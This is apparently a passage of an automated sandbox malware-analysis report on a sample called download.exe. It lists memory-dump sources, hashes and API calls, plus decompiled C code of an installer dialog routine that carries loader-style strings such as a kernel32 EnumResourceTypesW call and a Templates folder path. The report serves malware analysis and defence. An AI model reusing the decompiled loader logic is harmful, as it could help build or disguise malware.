                                                      • GetDlgItem.USER32(?,000003FE), ref: 00404FFA
                                                      • ShowWindow.USER32(00000000), ref: 00405001
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                      • String ID: $M$N
                                                      • API String ID: 1638840714-813528018
                                                      • Opcode ID: 172e59c7ba931a394c3fba9a3879f403beeb7489b9f7cd5918fdae017d576325
                                                      • Instruction ID: 95fc731ee8c2f60e707b2e347886eca1b13b95ad12058a055eb87ebce7bf2e6a
                                                      • Opcode Fuzzy Hash: 172e59c7ba931a394c3fba9a3879f403beeb7489b9f7cd5918fdae017d576325
                                                      • Instruction Fuzzy Hash: 720270B0900209EFEB149F58DD85AAE7BB5FB84315F10813AF610BA2E1D7789D52CF58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====
                                                      • API String ID: 0-3896120644
                                                      • Opcode ID: d9b641fc5660a61744befb0080907e735077113c026126cef0d934b954e8bcc4
                                                      • Instruction ID: 3f213e597d5967bf21a8d4cfa9f13e992bac1e882ecbde2c2810964cd0658294
                                                      • Opcode Fuzzy Hash: d9b641fc5660a61744befb0080907e735077113c026126cef0d934b954e8bcc4
                                                      • Instruction Fuzzy Hash: E0817873F2E701C9FB932460C5413F557B0CF2A593E21CBA1B827A1565B62F7A4E3A80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 78%
                                                      			E004044AE(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				long _v16;
                                                      				long _v20;
                                                      				long _v24;
                                                      				char _v28;
                                                      				intOrPtr _v32;
                                                      				long _v36;
                                                      				char _v40;
                                                      				unsigned int _v44;
                                                      				signed int _v48;
                                                      				CHAR* _v56;
                                                      				intOrPtr _v60;
                                                      				intOrPtr _v64;
                                                      				intOrPtr _v68;
                                                      				CHAR* _v72;
                                                      				void _v76;
                                                      				struct HWND__* _v80;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				intOrPtr _t82;
                                                      				long _t87;
                                                      				signed char* _t89;
                                                      				void* _t95;
                                                      				signed int _t96;
                                                      				int _t109;
                                                      				signed char _t114;
                                                      				signed int _t118;
                                                      				struct HWND__** _t122;
                                                      				intOrPtr _t124;
                                                      				intOrPtr* _t138;
                                                      				CHAR* _t146;
                                                      				intOrPtr _t147;
                                                      				unsigned int _t150;
                                                      				signed int _t152;
                                                      				unsigned int _t156;
                                                      				signed int _t158;
                                                      				signed int* _t159;
                                                      				signed char* _t160;
                                                      				struct HWND__* _t165;
                                                      				struct HWND__* _t166;
                                                      				int _t168;
                                                      				unsigned int _t197;
                                                      
                                                      				_t156 = __edx;
                                                      				_t82 =  *0x79ed18; // 0xae4f0c
                                                      				_v32 = _t82;
                                                      				_t2 = _t82 + 0x3c; // 0x0
                                                      				_t3 = _t82 + 0x38; // 0x0
                                                      				_t146 = ( *_t2 << 0xa) + "kernel32::EnumResourceTypesW(i 0,i r1,i 0)";
                                                      				_v12 =  *_t3;
                                                      				if(_a8 == 0x40b) {
                                                      					E0040567D(0x3fb, _t146);
                                                      					E004061E7(_t146);
                                                      				}
                                                      				_t166 = _a4;
                                                      				if(_a8 != 0x110) {
                                                      					L8:
                                                      					if(_a8 != 0x111) {
                                                      						L20:
                                                      						if(_a8 == 0x40f) {
                                                      							L22:
                                                      							_v8 = _v8 & 0x00000000;
                                                      							_v12 = _v12 & 0x00000000;
                                                      							E0040567D(0x3fb, _t146);
                                                      							if(E00405A03(_t185, _t146) == 0) {
                                                      								_v8 = 1;
                                                      							}
                                                      							E00405F7D(0x79e510, _t146);
                                                      							_t87 = E00406315(1);
                                                      							_v16 = _t87;
                                                      							if(_t87 == 0) {
                                                      								L30:
                                                      								E00405F7D(0x79e510, _t146);
                                                      								_t89 = E004059AE(0x79e510);
                                                      								_t158 = 0;
                                                      								if(_t89 != 0) {
                                                      									 *_t89 =  *_t89 & 0x00000000;
                                                      								}
                                                      								if(GetDiskFreeSpaceA(0x79e510,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                      									goto L35;
                                                      								} else {
                                                      									_t168 = 0x400;
                                                      									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                      									asm("cdq");
                                                      									_v48 = _t109;
                                                      									_v44 = _t156;
                                                      									_v12 = 1;
                                                      									goto L36;
                                                      								}
                                                      							} else {
                                                      								_t159 = 0;
                                                      								if(0 == 0x79e510) {
                                                      									goto L30;
                                                      								} else {
                                                      									goto L26;
                                                      								}
                                                      								while(1) {
                                                      									L26:
                                                      									_t114 = _v16(0x79e510,  &_v48,  &_v28,  &_v40);
                                                      									if(_t114 != 0) {
                                                      										break;
                                                      									}
                                                      									if(_t159 != 0) {
                                                      										 *_t159 =  *_t159 & _t114;
                                                      									}
                                                      									_t160 = E0040595C(0x79e510);
                                                      									 *_t160 =  *_t160 & 0x00000000;
                                                      									_t159 = _t160 - 1;
                                                      									 *_t159 = 0x5c;
                                                      									if(_t159 != 0x79e510) {
                                                      										continue;
                                                      									} else {
                                                      										goto L30;
                                                      									}
                                                      								}
                                                      								_t150 = _v44;
                                                      								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                      								_v44 = _t150 >> 0xa;
                                                      								_v12 = 1;
                                                      								_t158 = 0;
                                                      								__eflags = 0;
                                                      								L35:
                                                      								_t168 = 0x400;
                                                      								L36:
                                                      								_t95 = E00404942(5);
                                                      								if(_v12 != _t158) {
                                                      									_t197 = _v44;
                                                      									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                      										_v8 = 2;
                                                      									}
                                                      								}
                                                      								_t147 =  *0x7a271c; // 0xaea04d
                                                      								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                                      									E0040492A(0x3ff, 0xfffffffb, _t95);
                                                      									if(_v12 == _t158) {
                                                      										SetDlgItemTextA(_a4, _t168, 0x79e500);
                                                      									} else {
                                                      										E00404865(_t168, 0xfffffffc, _v48, _v44);
                                                      									}
                                                      								}
                                                      								_t96 = _v8;
                                                      								 *0x7a3004 = _t96;
                                                      								if(_t96 == _t158) {
                                                      									_v8 = E0040140B(7);
                                                      								}
                                                      								if(( *(_v32 + 0x14) & _t168) != 0) {
                                                      									_v8 = _t158;
                                                      								}
                                                      								E0040403E(0 | _v8 == _t158);
                                                      								if(_v8 == _t158 &&  *0x79f530 == _t158) {
                                                      									E00404407();
                                                      								}
                                                      								 *0x79f530 = _t158;
                                                      								goto L53;
                                                      							}
                                                      						}
                                                      						_t185 = _a8 - 0x405;
                                                      						if(_a8 != 0x405) {
                                                      							goto L53;
                                                      						}
                                                      						goto L22;
                                                      					}
                                                      					_t118 = _a12 & 0x0000ffff;
                                                      					if(_t118 != 0x3fb) {
                                                      						L12:
                                                      						if(_t118 == 0x3e9) {
                                                      							_t152 = 7;
                                                      							memset( &_v76, 0, _t152 << 2);
                                                      							_v80 = _t166;
                                                      							_v72 = 0x79f540;
                                                      							_v60 = E004047FF;
                                                      							_v56 = _t146;
                                                      							_v68 = E00405F9F(_t146, 0x79f540, _t166, 0x79e918, _v12);
                                                      							_t122 =  &_v80;
                                                      							_v64 = 0x41;
                                                      							__imp__SHBrowseForFolderA(_t122);
                                                      							if(_t122 == 0) {
                                                      								_a8 = 0x40f;
                                                      							} else {
                                                      								__imp__CoTaskMemFree(_t122);
                                                      								E00405915(_t146);
                                                      								_t124 =  *0x7a2f54; // 0xae4de0
                                                      								_t26 = _t124 + 0x11c; // 0x4e
                                                      								_t125 =  *_t26;
                                                      								if( *_t26 != 0 && _t146 == "C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Heize") {
                                                      									E00405F9F(_t146, 0x79f540, _t166, 0, _t125);
                                                      									if(lstrcmpiA(0x7a1ee0, 0x79f540) != 0) {
                                                      										lstrcatA(_t146, 0x7a1ee0);
                                                      									}
                                                      								}
                                                      								 *0x79f530 =  *0x79f530 + 1;
                                                      								SetDlgItemTextA(_t166, 0x3fb, _t146);
                                                      							}
                                                      						}
                                                      						goto L20;
                                                      					}
                                                      					if(_a12 >> 0x10 != 0x300) {
                                                      						goto L53;
                                                      					}
                                                      					_a8 = 0x40f;
                                                      					goto L12;
                                                      				} else {
                                                      					_t165 = GetDlgItem(_t166, 0x3fb);
                                                      					if(E00405982(_t146) != 0 && E004059AE(_t146) == 0) {
                                                      						E00405915(_t146);
                                                      					}
                                                      					 *0x7a2718 = _t166;
                                                      					SetWindowTextA(_t165, _t146);
                                                      					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                      					_push(1);
                                                      					E0040401C(_t166);
                                                      					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                      					_push(0x14);
                                                      					E0040401C(_t166);
                                                      					E00404051(_t165);
                                                      					_t138 = E00406315(7);
                                                      					if(_t138 == 0) {
                                                      						L53:
                                                      						return E00404083(_a8, _a12, _a16);
                                                      					} else {
                                                      						 *_t138(_t165, 1);
                                                      						goto L8;
                                                      					}
                                                      				}
                                                      			}
                                                      0x004045f4
                                                      0x004045fc
                                                      0x00404609
                                                      0x0040461d
                                                      0x00404621
                                                      0x00404621
                                                      0x0040461d
                                                      0x00404626
                                                      0x00404633
                                                      0x00404633
                                                      0x004045e0
                                                      0x00000000
                                                      0x00404598
                                                      0x00404586
                                                      0x00000000
                                                      0x00000000
                                                      0x0040458c
                                                      0x00000000
                                                      0x004044f7
                                                      0x00404504
                                                      0x0040450d
                                                      0x0040451a
                                                      0x0040451a
                                                      0x00404521
                                                      0x00404527
                                                      0x00404530
                                                      0x00404533
                                                      0x00404536
                                                      0x0040453e
                                                      0x00404541
                                                      0x00404544
                                                      0x0040454a
                                                      0x00404551
                                                      0x00404558
                                                      0x004047ea
                                                      0x004047fc
                                                      0x0040455e
                                                      0x00404561
                                                      0x00000000
                                                      0x00404561
                                                      0x00404558

                                                      APIs
                                                      • GetDlgItem.USER32(?,000003FB), ref: 004044FD
                                                      • SetWindowTextA.USER32(00000000,-007A4000), ref: 00404527
                                                      • SHBrowseForFolderA.SHELL32(?,0079E918,?), ref: 004045D8
                                                      • CoTaskMemFree.OLE32(00000000), ref: 004045E3
                                                      • lstrcmpiA.KERNEL32(Call,0079F540), ref: 00404615
                                                      • lstrcatA.KERNEL32(-007A4000,Call), ref: 00404621
                                                      • SetDlgItemTextA.USER32(?,000003FB,-007A4000), ref: 00404633
                                                        • Part of subcall function 0040567D: GetDlgItemTextA.USER32(?,?,00000400,0040466A), ref: 00405690
                                                        • Part of subcall function 004061E7: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\download.exe",75A63410,C:\Users\user\AppData\Local\Temp\,00000000,004031C4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033FB,?,00000006,00000008,0000000A), ref: 0040623F
                                                        • Part of subcall function 004061E7: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040624C
                                                        • Part of subcall function 004061E7: CharNextA.USER32(?,"C:\Users\user\Desktop\download.exe",75A63410,C:\Users\user\AppData\Local\Temp\,00000000,004031C4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033FB,?,00000006,00000008,0000000A), ref: 00406251
                                                        • Part of subcall function 004061E7: CharPrevA.USER32(?,?,75A63410,C:\Users\user\AppData\Local\Temp\,00000000,004031C4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033FB,?,00000006,00000008,0000000A), ref: 00406261
                                                      • GetDiskFreeSpaceA.KERNEL32(0079E510,?,?,0000040F,?,0079E510,0079E510,-007A4000,00000001,0079E510,-007A4000,-007A4000,000003FB,-007A4000), ref: 004046F1
                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040470C
                                                        • Part of subcall function 00404865: lstrlenA.KERNEL32(0079F540,0079F540,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404780,000000DF,00000000,00000400,-007A4000), ref: 00404903
                                                        • Part of subcall function 00404865: wsprintfA.USER32 ref: 0040490B
                                                        • Part of subcall function 00404865: SetDlgItemTextA.USER32(?,0079F540), ref: 0040491E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                      • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize$Call$kernel32::EnumResourceTypesW(i 0,i r1,i 0)
                                                      • API String ID: 2624150263-9343340
                                                      • Opcode ID: 835ebef96d9a185249aca47752db4aea3ea54f97fa15e05f5d6c04df71dbffb3
                                                      • Instruction ID: c3220bc8085252b6637529823acfaab3e79984cbb1e105c0cbc22f2c5a0eab13
                                                      • Opcode Fuzzy Hash: 835ebef96d9a185249aca47752db4aea3ea54f97fa15e05f5d6c04df71dbffb3
                                                      • Instruction Fuzzy Hash: 61A171B1900209ABDB11EFA6CD45AAFB7B8EF85314F10443BF601B72D1D77C8A418B69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4d9c00008dee22138cd6c4d5bc446fa872936aa3ecf945ad87215f6f36c07e8c
                                                      • Instruction ID: cea1e4cdf467b6dcaf8aff923fcf5912389094e4882551f193cb750d0739731c
                                                      • Opcode Fuzzy Hash: 4d9c00008dee22138cd6c4d5bc446fa872936aa3ecf945ad87215f6f36c07e8c
                                                      • Instruction Fuzzy Hash: 5EC17973F2E305D9FB932470C5913F55770CF2A283E20CB95B827A1565762F3A4A3684
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 47d19f311c17ddbf31a0296d2ff7372301d7a12be44b976f200de30f0f3bc46f
                                                      • Instruction ID: 41a6b4ed9bfc00cd595d092650880e514b19c7145217bb3f13253154444ff0b2
                                                      • Opcode Fuzzy Hash: 47d19f311c17ddbf31a0296d2ff7372301d7a12be44b976f200de30f0f3bc46f
                                                      • Instruction Fuzzy Hash: D8B15873F2E305C9FB932470C5913F55770CF2A193E20CB95B827A1566762F7A4A3684
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c62acac935498de77f0ea12f698ff2468b2beadfc83e55480977d7808626c8bd
                                                      • Instruction ID: 48eae4205c73a46bcd8c58b49a2ae9867e95eeb91294712b942ebc39ce99a31b
                                                      • Opcode Fuzzy Hash: c62acac935498de77f0ea12f698ff2468b2beadfc83e55480977d7808626c8bd
                                                      • Instruction Fuzzy Hash: 5AA17873F2E301C9FB932570C5913F55770CF2A583E20CBA6B827A1565B62E7A4A3684
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2ea80f3aacdee8e2e7b719f497faf1c1cf233b81b3376d420beda7d73708fe31
                                                      • Instruction ID: 539e092d09be6fb3522eebcf86b6b74b8256d359c30ff08aba7eb1e4d57abb48
                                                      • Opcode Fuzzy Hash: 2ea80f3aacdee8e2e7b719f497faf1c1cf233b81b3376d420beda7d73708fe31
                                                      • Instruction Fuzzy Hash: A6916873F2E301C9FB932570C5913F55B70CF2B193E20CBA5B827A1565B62E7A4A3684
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9979c841bea3ebe829be0635d2654367a7ff8a72a0e5e8b5137783981dd06e80
                                                      • Instruction ID: 00bec70114ac0ea628acc2df093b594d548292b7678a419c36e9a48dc59b8155
                                                      • Opcode Fuzzy Hash: 9979c841bea3ebe829be0635d2654367a7ff8a72a0e5e8b5137783981dd06e80
                                                      • Instruction Fuzzy Hash: 29A17A73F2E301C9FB932470C5913F55770CF2A593E20CB967827A1565B62F7A4A3684
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3e280bd7e5614d1752104b701245be459c68db710dd1f5198f0eeda745dbbfb8
                                                      • Instruction ID: 8dfe568ac6bad4810b0b9219d22130eb2d675f59e75b298eb9d119fbe9f2a9bd
                                                      • Opcode Fuzzy Hash: 3e280bd7e5614d1752104b701245be459c68db710dd1f5198f0eeda745dbbfb8
                                                      • Instruction Fuzzy Hash: C8B16773F2E305C9EB932470C5913F557B0CF2A183E208B95B82BA15657A2F7A4A3684
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b8a9f788e6965b2073b4e2118d8b1b6b394c9aae66f35b6588e54c8e3d790f0e
                                                      • Instruction ID: 4618c9d1a897c67a532e59f5075c8ead26a8117728397148405df81fee0a9ce9
                                                      • Opcode Fuzzy Hash: b8a9f788e6965b2073b4e2118d8b1b6b394c9aae66f35b6588e54c8e3d790f0e
                                                      • Instruction Fuzzy Hash: CA517972F2E701C9FB936470C1813F65AB0CF2A183E218BA17C27A1565762F7A4D2784
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 14d6636d3c0a8f4a82e865e3ca296a609ebf8fc7e651e6ca182919933a69f68e
                                                      • Instruction ID: 8153471ebb2f20aa24a4208bc7d80bc3e60cfb142e77bafa570f08e19d8d2a11
                                                      • Opcode Fuzzy Hash: 14d6636d3c0a8f4a82e865e3ca296a609ebf8fc7e651e6ca182919933a69f68e
                                                      • Instruction Fuzzy Hash: 6271BB62F1E701C9FF535E30A4493B69A60CF2B173E928796FCB255051B62E794D23B0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 31dad86bbec9dcc08c78b8f55ecbdf5a5fef8bd365ca3a9426849276adcc99c3
                                                      • Instruction ID: c965264e530268bb3821991ba73c6c7ebd83f0f00d43bb4add31b0830984fd62
                                                      • Opcode Fuzzy Hash: 31dad86bbec9dcc08c78b8f55ecbdf5a5fef8bd365ca3a9426849276adcc99c3
                                                      • Instruction Fuzzy Hash: A3B18973F2E305C9FB932470C5913F65770CF2A193E20CB967827A15657A2F7A4A3684
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0480526ec60c159da9568181ef415b256955e2daabb1c6eccdb4806b4389848e
                                                      • Instruction ID: 88f9f864bdf0e37a601a6d1c85ff647ab43fe85de1a588076f63842bff538115
                                                      • Opcode Fuzzy Hash: 0480526ec60c159da9568181ef415b256955e2daabb1c6eccdb4806b4389848e
                                                      • Instruction Fuzzy Hash: 85B15873F2E305C9FB932470C5913F55770CF2A283E208B95B827A1565BA2F7A4A36C4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f108e71195a2cf2a402ec2eb79f8e2502cddd0e566f8021a4210709758292dbb
                                                      • Instruction ID: e472fb1d0c73fc7446799e184665fb188d667cf558e600499c1da2772943d7d9
                                                      • Opcode Fuzzy Hash: f108e71195a2cf2a402ec2eb79f8e2502cddd0e566f8021a4210709758292dbb
                                                      • Instruction Fuzzy Hash: 4C716873F2E701C9EB932470C5413F557B0CF2A693E21CBA1B827A1565B62F7A4E3680
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 94b51afe499ee049485f30a5bd6003fa5b35b5580c658bee08e4a44514f68481
                                                      • Instruction ID: b070af8f6ce672b348cf87f55e009ba3db1811406700c013a4a079b4e87c4698
                                                      • Opcode Fuzzy Hash: 94b51afe499ee049485f30a5bd6003fa5b35b5580c658bee08e4a44514f68481
                                                      • Instruction Fuzzy Hash: DDA166B3F2E305C9FB932470C5913F55770CF2A283E20CB95B827A1565B62E7A4E3684
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 90756a3c0113fa6cfb946d7e92ebcfed70d72d63ffd22f3f0a3e974aaaaa7a65
                                                      • Instruction ID: 92ec3ae88d7b976713a54493a02ae85ae796ef571111e2ce2f06ac6716d7e820
                                                      • Opcode Fuzzy Hash: 90756a3c0113fa6cfb946d7e92ebcfed70d72d63ffd22f3f0a3e974aaaaa7a65
                                                      • Instruction Fuzzy Hash: 4DB17BB3F2E305C9FB932470C5913F55770CF2A193E20CB957827A15657A2F7A4A3684
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e8dba91828ce305319a5439bcbbad518807be3f419e5a6bd9591dc08a9bdd4f1
                                                      • Instruction ID: 8f7dc6129874cebe069c068427caffb333025fcb62c8032cfe5978c0cb3f6456
                                                      • Opcode Fuzzy Hash: e8dba91828ce305319a5439bcbbad518807be3f419e5a6bd9591dc08a9bdd4f1
                                                      • Instruction Fuzzy Hash: 40716873F2E701D9FB932470C5813F656B0CF2A593E21CBA17827A1565B62F7A4E2680
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8e2337a2c25e09fee09234ce6f667e888ca69e3f49041c9c2231b8361a10812c
                                                      • Instruction ID: 02d1b7c9b9b58df1c693939dfcec844affc371b7604a2102434d9149b0e7d765
                                                      • Opcode Fuzzy Hash: 8e2337a2c25e09fee09234ce6f667e888ca69e3f49041c9c2231b8361a10812c
                                                      • Instruction Fuzzy Hash: 2FB15873F2E305C9FB932470C5913F55770CF2A193E208B957827A15667A2E7A4E3684
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1806817167.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_4a30000_download.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f3d664a34e0589ee41711e2504eb9be75a299c3ff047ce26a5ce17e1d4662252
                                                      • Instruction ID: 31bbe1a2d58322af45779ab47e58a44e48bd2a68ca95cf61d881f5d8a76bd262
                                                      • Opcode Fuzzy Hash: f3d664a34e0589ee41711e2504eb9be75a299c3ff047ce26a5ce17e1d4662252
                                                      • Instruction Fuzzy Hash: 46A179B3F2E305C9FB932470C5913F55770CF2A583E20CB95B827A1565B62E7A4E3684
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
